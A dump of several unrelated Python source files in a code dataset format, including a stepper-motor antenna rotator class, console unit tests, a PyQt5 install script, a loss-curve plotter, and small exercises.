\n\n def handle_exception(self, e):\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.critical(exc_type, fname, exc_tb.tb_lineno)\n logging.critical(e)\n print(exc_type, fname, exc_tb.tb_lineno)\n print(e)\n \n sys.stderr.write(\"Rotator.py: \" + repr(e) + \"\\n\")\n return 2 \n\n def get_degrees(self):\n return float((self.get_stepper_count() / self._steps_per_degree))\n\n def get_stepper_count(self):\n return self._stepper_count\n \n def set_stepper_count(self, stepper_count):\n self._stepper_count = stepper_count\n \n def reverse_movement(self):\n self._reverse_movement = not self._reverse_movement\n \n #new_max_step = -1 * self._steppercount_min\n #new_min_step = -1 * self._steppercount_max\n #self._steppercount_min = new_min_step\n #self._steppercount_max = new_max_step\n\n #new_max_encoder = self._encoderposition_min\n #new_min_encoder = self._encoderposition_max\n #self._encoderposition_min = new_max_encoder\n #self._encoderposition_max = new_min_encoder\n\n #Re-Center\n def recenter(self):\n try:\n logging.info(\"Recentering \" + str(self._axis_name)+\" To Encoder Value: \"+ str(self._encoderposition_center))\n encoder_position_current = self.read_encoder_average()\n encoderposition_previous = encoder_position_current\n logging.info(\"Current Encoder Value = \" + str(encoder_position_current))\n nSteps = 0\n\n # set default direction forward\n is_forward = True\n direction_required = Adafruit_MotorHAT.FORWARD\n stepper_incriment = 1\n limit_label = \"Maximum\"\n\n # then check to see if we need to go backward\n if (encoder_position_current > self._encoderposition_center):\n is_forward = False\n\n # set reverse if needed\n if (is_forward is False):\n direction_required = Adafruit_MotorHAT.BACKWARD\n stepper_incriment = -1\n limit_label = \"Minimum\"\n\n # start motion\n self._is_busy = True\n keep_moving = True\n while (keep_moving is True):\n nSteps+=stepper_incriment\n self._stepper.step(1, direction_required, Adafruit_MotorHAT.DOUBLE)\n encoderposition_previous = encoder_position_current\n encoder_position_current = self.read_encoder_average() \n\n #check it see if the encoder value is bouncing, if so then re-read encoder\n if( abs(encoder_position_current - encoderposition_previous) > 4 ):\n logging.warning(\"Received Unexpected Encoder with Previous Value: \"+str(encoderposition_previous)+\"; New Outlier Value: \"+str(encoder_position_current)+\"; sleeping 1 second\")\n time.sleep(1)\n encoder_position_current = self.read_encoder_average()\n encoderposition_previous = encoder_position_current\n logging.warning(\"Re-Reading Encoder with New Value \"+str(encoder_position_current))\n logging.info(\"Steps: \" + str(nSteps) + \", \"+str(encoder_position_current))\n\n if ((is_forward is True) and (encoder_position_current > self._encoderposition_center)):\n logging.info(\"Stepping Forward, Found Center at: \" + str(encoder_position_current))\n keep_moving = False\n if ((is_forward is False) and (encoder_position_current < self._encoderposition_center)):\n logging.info(\"Stepping Backward, Found Center at: \" + str(encoder_position_current))\n keep_moving = False\n if False == self.check_encoder_limits(encoder_position_current):\n logging.warning(\" Exceeded \"+limit_label+\" of: \"+str(limit_label)+\" Encoder Limit Value at: \" + str(encoder_position_current)+ \"; Re-Centering .\")\n keep_moving = False\n\n\n self._is_busy = False\n logging.info(\"Total Steps: \" + str(nSteps))\n \n self.set_stepper_count(self._steppercount_center)\n self._requires_calibration = False\n logging.info(\"Current Reading: \"+str(self.get_degrees())+\" \"+str(self._axis_name)+ \", Now Centered on Tripod with Encoder Position = \" + str(self._adc.read(0)))\n\n return self.get_degrees()\n\n except Exception as e:\n self.handle_exception(e)\n return e\n\n\n\n # Set Position Based On Stepper Count\n def set_position(self, _target):\n try: \n if(self._requires_calibration == True):\n self.recenter()\n \n steps_required, self.target = self.calculate_steps(_target)\n\n logging.debug(\"Position Target: \"+ str(self.target) +\"; degrees per setp: \" + str(self._degrees_per_step) ) \n\n _current_degrees = self.get_degrees()\n if _target == _current_degrees:\n logging.info(\"Holding Steady at: \"+ str(_target))\n else:\n \n encoder_position_current = self.read_encoder_average()\n\n # set default direction forward\n is_forward = True\n direction_required = Adafruit_MotorHAT.FORWARD\n direction_label = \"Clockwise\"\n limit_label = \"Maximum\"\n stepper_incriment = 1\n \n # then check to see if we need to go backward\n if steps_required < 0:\n is_forward = False\n\n #check for reverse gear ratio (Elevation)\n if self._reverse_movement == True:\n is_forward = not is_forward\n stepper_incriment *= -1\n\n if(is_forward == False):\n direction_required = Adafruit_MotorHAT.BACKWARD\n direction_label = \"CounterClockwise\"\n limit_label = \"Minimum\"\n stepper_incriment *= -1\n \n logging.info(\" Target: \"+str(_target)+\", Current: \"+str(_current_degrees))\n logging.info(\" Stepper Count: \"+str(self.get_stepper_count())+\", Moving \"+str(direction_label)+\" by Estimated: \" + str(steps_required) + \" steps.\")\n\n #execute rotation \n self._is_busy = True \n for steps_taken in range(abs(steps_required)): \n \n # Step Motor\n self._stepper.step(1, direction_required, Adafruit_MotorHAT.DOUBLE)\n\n # Set Value to Be Returned to GPredict \n self.set_stepper_count(self.get_stepper_count() + stepper_incriment)\n encoder_position_current = self._adc.read(self._adc_channel)\n \n logging.debug(\"Interim Stepper Count:\"+str(self.get_stepper_count())+\"; Interim Degrees: \" + str(self.get_degrees()) + \" EncoderValue: \"+ str(encoder_position_current))\n\n # Check Limits\n if ((self.get_stepper_count() > self._steppercount_max) or (self.get_stepper_count() < self._steppercount_min)):\n logging.warning(\" Exceeded \"+limit_label+\" of: \"+str(limit_label)+\" Stepper Limit Value at: \" + str(self.get_stepper_count())+ \"; Re-Centering .\")\n self.recenter()\n break\n if False == self.check_encoder_limits(encoder_position_current):\n logging.warning(\" Exceeded \"+limit_label+\" of: \"+str(limit_label)+\" Encoder Limit Value at: \" + str(encoder_position_current)+ \"; Re-Centering .\")\n self.recenter()\n break\n\n self._is_busy = False\n logging.info(\"New Stepper Count: \"+str(self.get_stepper_count())+\"; New Degrees: \" + str(self.get_degrees()) + \" EncoderValue: \"+ str(encoder_position_current))\n return self.get_degrees()\n \n except Exception as e:\n self.handle_exception(e)\n return e\n\n def calculate_steps(self, _target):\n try:\n steps = int(0)\n _remainder = 0.0\n\n self._target_degrees = float(_target)\n logging.debug(\"Calculating Steps to Taget: \"+str(self._target_degrees) + \", with: \"+ str(self._steps_per_degree) + \" Steps Per Degree.\")\n\n #round down to nearest half degree\n _remainder = self._target_degrees % self._degrees_per_step\n _target = float(self._target_degrees - _remainder)\n \n #round back up if remainder was closer to upper bound\n if _remainder > (self._degrees_per_step / 2):\n _target += self._degrees_per_step\n\n degrees = float(_target) - float(self.get_degrees())\n steps = int(self._steps_per_degree * degrees)\n logging.debug(\"Steps Per Degree: \"+ str(self._steps_per_degree) +\"; Degrees: \"+str(degrees)+\"; Steps: \" + str(steps)+ \"; Remainder: \"+ str(_remainder)) \n \n return steps, _target\n\n except Exception as e:\n self.handle_exception(e)\n\n\n def check_encoder_limits(self, encoder_position_current):\n try:\n is_within_limits = True\n if (encoder_position_current > self._encoderposition_max):\n logging.warning(\"Current Encoder Value of: \"+str(encoder_position_current)+\" Exceeded Maximum Encoder Value of: \" + str(self._encoderposition_max))\n is_within_limits = True\n if (encoder_position_current < self._encoderposition_min):\n logging.warning(\"Current Encoder Value of: \"+str(encoder_position_current)+\" Exceeded Minimum Encoder Value of: \" + str(self._encoderposition_min))\n is_within_limits = True\n return is_within_limits\n\n except Exception as e:\n self.handle_exception(e)\n\n\n def read_encoder_average(self):\n num_samples = 6\n sample_subtotal = 0\n for i in range(0, num_samples):\n sample_subtotal += self._adc.read(self._adc_channel)\n\n encoder_average = sample_subtotal/num_samples\n logging.debug(\"Encoder Average: \" + str(encoder_average))\n encoder_tuple = divmod(encoder_average, 1.0)\n logging.debug(\"Encoder Rounded: \" + str(encoder_tuple[0]))\n return encoder_tuple[0]\n\n def stop(self):\n try: \n logging.info(\" Stop\")\n self._stepper.run(Adafruit_MotorHAT.RELEASE) \n self._requires_calibration = True\n except Exception as e:\n self.handle_exception(e)\n \n ","sub_path":"RadioAntenna/PiCode/SatTrackerPi_Gamma/Rotator/RotationalAxis.py","file_name":"RotationalAxis.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"329827205","text":"#!/usr/bin/python3\n\"\"\"[summary]\n\"\"\"\nfrom unittest import TestCase\nfrom unittest.mock import patch\nfrom io import StringIO\nfrom console import HBNBCommand\nimport os\nimport sys\n\n\nclass TestConsole(TestCase):\n \"\"\"[Test console]\n\n Args:\n TestCase ([obj]): [TestCase from unittest module]\n \"\"\"\n def setUp(self):\n \"\"\"[setup method]\n \"\"\"\n pass\n\n def tearDown(self):\n \"\"\"[teardown method]\n \"\"\"\n try:\n os.remove(\"file.json\")\n except FileNotFoundError:\n pass\n\n def test_class_name_missing(self):\n \"\"\"[test class name]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd(\"create\")\n msg = f.getvalue()[:-1]\n self.assertEqual(msg, \"** class name missing **\")\n\n def test_wrong_class(self):\n \"\"\"[test wrong class]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd(\"create bouhabra\")\n msg = f.getvalue()[:-1]\n self.assertEqual(msg, \"** class doesn't exist **\")\n\n def test_id_type(self):\n \"\"\"[test type id]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd(\"create User\")\n msg = f.getvalue()[:-1]\n self.assertEqual(type(msg), str)\n\n def test_all_output_type(self):\n \"\"\"[test type]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd(\"all\")\n msg = f.getvalue()[:-1]\n self.assertEqual(type(msg), str)\n\n def test_create_user(self):\n \"\"\"[test_user]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd('create User name=\"lothric\"')\n HBNBCommand().onecmd('all User')\n msg = f.getvalue()[:-1]\n self.assertTrue(\"'name': 'lothric'\" in msg)\n\n def test_decimal(self):\n \"\"\"[test_decimal]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd('create User number_bathrooms=4')\n HBNBCommand().onecmd('all User')\n msg = f.getvalue()[:-1]\n self.assertTrue(\"'number_bathrooms': 4\" in msg)\n\n def test_float(self):\n \"\"\"[test_float]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd('create User price=0.069')\n HBNBCommand().onecmd('all User')\n msg = f.getvalue()[:-1]\n self.assertTrue(\"'price': 0.069\" in msg)\n","sub_path":"tests/test_console.py","file_name":"test_console.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"199824210","text":"#!C:\\Users\\ancar\\Documents\\Git\\HomegrownAero\\Python\\SerialTest\\venv\\Scripts\\python.exe\n\"\"\"\nThis program installs PyQt5 from source. The steps are:\n\n 1. Download and install SIP\n 2. Download and install PyQt5\n\nRemember that Qt5 has to be installed already in your system, and qmake has to\nbe in the path in order to be invoked from the script. If qmake is not in your\npath, you should use the --qmake argument to explicit where it is.\n\nIf you are on MAC OS, you can install Qt5 using brew:\n\n brew install qt5\n\nIf you are on LINUX, you should be able to install Qt5 from your distribution\nrepositories.\n\nWINDOWS is not supported by this script, sorry.\n\nUsage:\n install_pyqt5.py [--qmake QMAKE_PATH]\n\nOptions:\n -h --help Shows this screen\n --qmake QMAKE_PATH Path to qmake executable\n\n\"\"\"\nimport platform\nimport wget\nimport tarfile\nimport subprocess\nimport blessings\nfrom docopt import docopt\n\nSIP_VERSION = '4.18.1'\nPYQT_VERSION = '5.7'\nSIP_NIX_URL = 'http://sourceforge.net/projects/pyqt/files/sip/' + \\\n 'sip-{0}/sip-{0}.tar.gz'.format(SIP_VERSION)\nPYQT_NIX_URL = 'https://sourceforge.net/projects/pyqt/files/PyQt5/' + \\\n 'PyQt-{0}/PyQt5_gpl-{0}.tar.gz'.format(PYQT_VERSION)\n\n\nclass PlatformNotSupportedException(Exception):\n\n def __init__(self, plat):\n self._platform = plat\n\n def __str__(self):\n return \"Sorry, your platform '{}' is not supported\".format(\n self._platform)\n\n\nclass Installer(object):\n\n @property\n def name(self):\n return self._name\n\n @property\n def version(self):\n return self._version\n\n @property\n def url(self):\n return self._url\n\n def __init__(self, name, version, url):\n self._name = name\n self._version = version\n self._url = url\n self._filename = ''\n self._folder = ''\n\n def download(self):\n self._filename = wget.download(self.url)\n\n def extract(self):\n if self._filename.endswith(\".gz\"):\n tar = tarfile.open(self._filename, 'r:gz')\n tar.extractall('.')\n self._folder = tar.getnames()[0]\n\n def configure(self, params=''):\n platform.os.chdir(self._folder)\n subprocess.check_call(['python', 'configure.py'] + params.split())\n\n def install(self):\n subprocess.check_call(['make'])\n subprocess.check_call(['make', 'install'])\n\n def cleanup(self):\n platform.os.chdir('../')\n if self._folder or self._filename:\n subprocess.check_call(['rm', '-r', self._folder, self._filename])\n\n\ndef install_helper(installer, config_params='', mac_patch=False):\n t = blessings.Terminal()\n name = '{0.name} {0.version}'.format(installer)\n try:\n print(t.bold(\"\\nDownloading {} from {}...\".format(\n name, installer.url)))\n installer.download()\n print(t.bold(\"\\n\\nExtracting {}...\".format(name)))\n installer.extract()\n print(t.bold('\\nConfiguring {}...'.format(name)))\n installer.configure(config_params)\n print(t.bold('\\nInstalling {}...'.format(name)))\n installer.install()\n except subprocess.CalledProcessError:\n exit()\n else:\n print(t.bold_green('\\n{} installed succesfully...'.format(name)))\n finally:\n print(t.bold('Cleaning up...\\n'))\n installer.cleanup()\n\n\ndef check_platform():\n try:\n plat = platform.system()\n if plat == \"Darwin\" or plat == \"Linux\":\n return SIP_NIX_URL, PYQT_NIX_URL\n else:\n raise PlatformNotSupportedException(plat)\n except PlatformNotSupportedException as e:\n print(blessings.Terminal().bold_red(str(e)))\n exit()\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n sip_url, pyqt_url = check_platform()\n\n # SIP\n install_helper(Installer('SIP', SIP_VERSION, sip_url))\n\n # PyQt5\n config_params = ''\n if arguments.get('--qmake'):\n config_params = '--qmake ' + arguments['--qmake'] + ' --verbose'\n\n install_helper(\n Installer('PyQt5', PYQT_VERSION, pyqt_url),\n config_params\n )\n","sub_path":"Python/SerialTest/venv/Scripts/install_pyqt5.py","file_name":"install_pyqt5.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"74718685","text":"#coding:utf-8\nimport sys\nimport re\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nin_log_path='./fcn_2017-10-19_22-51-51.txt' #输入日志文件的位置\nout_fig_path='./log.jpg' #输出图片的位置\nf=open(in_log_path,'r')\nloss=[]\n#train_loss=[]\n#test_loss=[]\n\nmax_iter=0\ntest_iter=0\ntest_interval=20\ndisplay=0\n#target_str=['accuracy = ','Test net output #1: loss = ','Train net output #0: loss = ',\n# 'max_iter: ','test_iter: ','test_interval: ','display: ']\ntarget_str=[', loss = ']\nwhile True:\n line=f.readline()\n # print len(line),line\n if len(line)<1:\n break\n for i in range(len(target_str)):\n str=target_str[i]\n idx = line.find(str)\n if idx != -1:\n num=float(line[idx + len(str):idx + len(str) + 6])\n if(i==0):\n loss.append(num)\n else:\n pass\nf.close()\n# print test_iter\n# print max_iter\n# print test_interval\n# print len(accuracy),len(test_loss),len(train_loss)\n\n_,ax1=plt.subplots()\n#ax2=ax1.twinx()\n\n#绘制accuracy曲线图像,颜色为红色'r'\nax1.plot(test_interval*np.arange(len(loss)),loss,color='r',label='loss',linestyle='-')\n\n#ax1.legend(loc=(0.7,0.8)) #使用二元组(0.7,0.8)定义标签位置\n#ax2.legend(loc=(0.7,0.72))\nax1.set_xlabel('iteration')#设置X轴标签\nax1.set_ylabel('loss') #设置Y1轴标签\n\nplt.savefig(out_fig_path,dpi=100) #将图像保存到out_fig_path路径中,分辨率为100\nplt.show() #显示图片\n","sub_path":"step1/VOC-RCF/rcf/rcf_top/logs/print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"410693661","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# 此代码仅供学习与交流,请勿用于商业用途。\n# 二手房信息的数据结构\n\n\nclass ErShou(object):\n def __init__(self, district, area, name, price, desc, pic, \n url, xiaoqu_url, xiaoqu_name, hid, unit_price):\n self.district = district\n self.area = area\n self.price = price\n self.name = name\n self.desc = desc\n self.pic = pic\n self.url = url\n self.xiaoqu_url = xiaoqu_url\n self.xiaoqu_name = xiaoqu_name\n self.hid=hid\n self.unit_price=unit_price\n\n def text(self):\n return ','.join([self.url,\n self.hid,\n self.district,\n self.area,\n self.xiaoqu_name,\n self.name,\n self.price,\n self.unit_price,\n self.desc,\n '\"\"\"'+self.pic+'\"\"\"',\n ])\n\n\n","sub_path":"lib/item/ershou.py","file_name":"ershou.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"366855956","text":"import pandas as pd\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom math import atan, exp\n\n\nclass CurveConverter:\n def __init__(self, functionalforms, curves, coefficient_cols, logger):\n self.functionalforms = functionalforms\n self.curves = curves\n self.coefficient_cols = coefficient_cols\n self.coefficienta = np.array(self.curves['coefficienta'])\n self.coefficientb = np.array(self.curves['coefficientb'])\n self.coefficientc = np.array(self.curves['coefficientc'])\n self.output_curve = 'ADBUDG'\n\n self.actual_field = 'Y_actual'\n self.output_field = 'Y_adbudg'\n self.adstock_field = 'adstock'\n self.logger = logger\n\n\n def lower_case(self):\n self.functionalforms = dict((k, v.lower()) for k, v in self.functionalforms.items())\n\n def get_curve_name(self, row, field):\n return self.curves.loc[row, field]\n\n def get_curve_equation(self, formname):\n return self.functionalforms[formname]\n\n def get_coefficienta(self, row):\n return self.coefficienta[row]\n\n def curve_eval(self, coefficienta, coefficientb, coefficientc, adstock, curve_name):\n return eval(self.get_curve_equation(curve_name))\n\n def create_adstock(self, stimuli, curve_row, ntimes=5,step=10, step2=20, nrows=None):\n self.df = pd.DataFrame(columns=self.coefficient_cols)\n # self.df['Percentage'] = pd.Series(np.arange(10, 100*ntimes, step) / 100)\n self.df['Percentage'] = pd.Series(np.array(list(np.arange(10, 120, step) / 100)+ list(np.arange(120, 100*ntimes\n , step2) / 100)))\n if nrows:\n try:\n self.df = self.df.iloc[0:nrows,:]\n except:\n self.df = self.df\n\n self.df['adstock'] = self.df['Percentage'] * stimuli\n self.adstock = self.df['adstock'].values\n # print(self.coefficienta[curve_row])\n self.df['coefficienta'] = self.coefficienta[curve_row]\n self.df['coefficientb'] = self.coefficientb[curve_row]\n self.df['coefficientc'] = self.coefficientc[curve_row]\n # return self.df\n\n def scale_adstock(self, multiplier=1):\n self.adstock = self.adstock * multiplier\n\n def eval_curve(self, curve_name, output_field):\n # self.df[output_field] = self.df.eval(self.get_curve_equation(curve_name))\n self.df['curve_name'] = curve_name\n self.df[output_field] = np.vectorize(self.curve_eval)(self.df['coefficienta'], self.df['coefficientb'], self.df['coefficientc'], self.df['adstock'], self.df['curve_name'])\n self.Y_actual = self.df[output_field].values\n return self.df\n\n def eval_curve_series(self, df, curve_name, output_field, coefficienta, coefficientb\n , coefficientc):\n df['coefficienta'] = coefficienta\n df['coefficientb'] = coefficientb\n df['coefficientc'] = coefficientc\n df[output_field] = df.eval(self.get_curve_equation(curve_name))\n return df\n\n def eval_adbudg(self, input_dict):\n coefficienta = input_dict[0]\n coefficientb = input_dict[1]\n coefficientc = input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb) / ((self.adstock ** coefficientb) + (coefficientc ** coefficientb))))\n\n def set_volumes(self, actual, new):\n self.actual_volume = actual\n self.new_volume = new\n\n def get_objective_numpy(self, input_dict):\n coefficienta= input_dict[0]\n coefficientb= input_dict[1]\n coefficientc= input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb)/((self.adstock ** coefficientb) + (coefficientc ** coefficientb))))\n return np.sum(np.absolute(self.new_adbudg - self.Y_actual))\n\n\n def get_objective_numpy_volume(self, input_dict):\n coefficienta= input_dict[0]\n coefficientb= input_dict[1]\n coefficientc= input_dict[2]\n self.new_adbudg = (coefficienta * ((self.adstock ** coefficientb)/((self.adstock ** coefficientb) + (coefficientc ** coefficientb))))\n return np.sum(np.absolute((self.new_adbudg/self.new_volume) - (self.Y_actual/self.actual_volume)))\n\n\n def get_objective_value(self, final_curve, actual_curve):\n return np.sum(np.absolute(final_curve - actual_curve))\n\n def get_new_coeffs(self, coeffs):\n # bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy, coeffs, method='nelder-mead'# method='SLSQP'\n #, bounds=bnds\n , tol=1e-2, options={'maxiter': 10000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return np.array(model.x.tolist())\n\n def get_new_coeffs_bounds(self, coeffs):\n bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy, coeffs, method='SLSQP'\n , bounds=bnds\n , tol=1e-8, options={'maxiter': 10000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return [0, 0, 0]\n\n def get_new_coeffs_volume(self, coeffs):\n # bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy_volume, coeffs, method='nelder-mead'\n # , bounds=bnds\n , tol=1e-2, options={'maxiter': 100000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return np.array(model.x.tolist())#[0, 0, 0]\n\n def get_new_coeffs_volume_bnds(self, coeffs):\n bnds = ((0, float('inf')),)*len(coeffs)\n model = minimize(self.get_objective_numpy_volume, coeffs, method='SLSQP'\n , bounds=bnds\n , tol=1e-2, options={'maxiter': 100000})\n if model.success:\n return np.array(model.x.tolist())\n else:\n return [0, 0, 0]\n\n def minimize_options(self, coeffs_list, power=0):\n new_coeffs_list = []\n for i in coeffs_list:\n new_coeffs_list.append(self.get_new_coeffs_bounds(i))\n if power == 0:\n new_coeffs_list.append(self.get_new_coeffs(i))\n diff_list = []\n for new_coeff in new_coeffs_list:\n self.eval_adbudg(new_coeff)\n diff_list.append(np.sum(np.absolute(self.new_adbudg - self.Y_actual)))\n return new_coeffs_list, diff_list\n\n def minimize_options_volume(self, coeffs_list, power=0):\n new_coeffs_list = []\n for i in coeffs_list:\n new_coeffs_list.append(self.get_new_coeffs_volume_bnds(i))\n new_coeffs_list.append(self.get_new_coeffs_volume(i))\n diff_list = []\n for new_coeff in new_coeffs_list:\n self.eval_adbudg(new_coeff)\n diff_list.append(np.sum(np.absolute(self.new_adbudg - self.Y_actual)))\n return new_coeffs_list, diff_list\n\n def convert_curve(self, curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col, _stimuli_type_col, curve_row):\n stimuli = curves_4[_spend_mean_col][curve_row]\n curve_name = self.get_curve_name(curve_row, form_col)\n power = 0\n coeffs[1] = 1\n if curve_name in ['POWER']:\n stimuli = 40000 / (curves_4['coefficienta'][curve_row] + 10)\n power = 1 if curves_4['coefficienta'][curve_row] < 5 else 0\n coeffs[1] = curves_4['coefficientb'][curve_row]\n if curve_name in ['LINEAR']:\n stimuli = 1000 / curves_4['coefficienta'][curve_row]\n if curve_name in ['NEGATIVE_EXPONENTIAL']:\n stimuli = max(curves_4['coefficienta'][curve_row], stimuli)\n # print(curves_4[_stimuli_type_col][curve_row])\n if (curves_4[_stimuli_type_col][curve_row] == 'Impressions'):\n stimuli = 10000000\n # print(stimuli)\n\n self.create_adstock(stimuli, curve_row, ntimes=5, step=1, step2=10)\n df = self.eval_curve(curve_name, 'Y_actual')\n if curve_name == 'ADBUDG':\n new_coeffs = df[['coefficienta', 'coefficientb', 'coefficientc']].iloc[0, :].values\n else:\n coeffs_sub = df[['coefficienta', 'coefficientb', 'coefficientc']].iloc[0, :].values\n coeffs_sub[0] = max(coeffs_sub[0], 1)\n coeffs_sub[1] = 1 if curve_name != 'POWER' else coeffs_sub[1]\n coeffs_sub[2] = max(coeffs_sub[2], 1) if curve_name != 'ATAN_LINEAR' else stimuli\n\n import warnings\n warnings.filterwarnings(\"error\")\n\n if curve_name in ['LINEAR']:\n try:\n new_coeffs = self.get_new_coeffs_bounds(coeffs.copy())\n except Warning:\n new_coeffs = self.get_new_coeffs(coeffs.copy())\n else:\n warnings.filterwarnings(\"ignore\")\n # new_coeffs = converter.get_new_coeffs(coeffs.copy())\n new_coeffs_list, diff_list = self.minimize_options([coeffs_sub, coeffs.copy()], power)\n result = np.all(diff_list == diff_list[0])\n if (result) & (power == 0):\n self.logger.info('----- Reducing the scale of stimuli to fit the curve better')\n self.create_adstock(stimuli / 10, curve_row, ntimes=5, step=1, step2=30)\n df = self.eval_curve(curve_name, 'Y_actual')\n new_coeffs_list, diff_list = self.minimize_options([coeffs_sub, coeffs.copy()])\n new_coeffs = new_coeffs_list[np.argmin(diff_list)]\n self.eval_adbudg(new_coeffs)\n comparison_df = pd.DataFrame(data=[self.adstock, self.Y_actual, self.new_adbudg]).T\n comparison_df.columns = [_stimuli_col, 'Actual', 'New_Adbudg']\n comparison_df['CurveID'] = curve_row\n\n return pd.DataFrame(new_coeffs).T, comparison_df\n\n def convert_curve_group(self, curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col, _stimuli_type_col, i, j):\n results = []\n comparison_df_final = []\n for curve_row in range(i, j):\n new_coeffs, comparison_df = self.convert_curve(curves_4, coeffs, form_col, _spend_mean_col, _stimuli_col,\n _stimuli_type_col, curve_row)\n results.append(new_coeffs)\n comparison_df_final.append(comparison_df)\n return results, comparison_df_final\n\n\n\n\n","sub_path":"CurveAggregation/Proxy/src/helpers/curve_converter.py","file_name":"curve_converter.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"547514415","text":"# Python Implementation\n# Array Traversal\n# Printing All Array Elements\n\nfrom array import *\n\narray1 = array('i', [1,2,3,4,5,6,7,8,9,10])\n\nprint(\"Array Elements:\")\n\nfor x in array1:\n print(x)\n","sub_path":"Data Structure/Array/python/array_traverse.py","file_name":"array_traverse.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"484279271","text":"def isPalindrome(number):\r\n return str(number) == str(number)[::-1]\r\n\r\ntest=int(input())\r\n\r\nfor i in range(test):\r\n\r\n first=int(input())\r\n\r\n factors=[0,0]\r\n found=False\r\n\r\n while(not found):\r\n\r\n while not isPalindrome(first):\r\n first-=1\r\n\r\n palin = first\r\n first-=1\r\n\r\n for i in range(999,99,-1):\r\n if ((palin//i) >999 or (i*i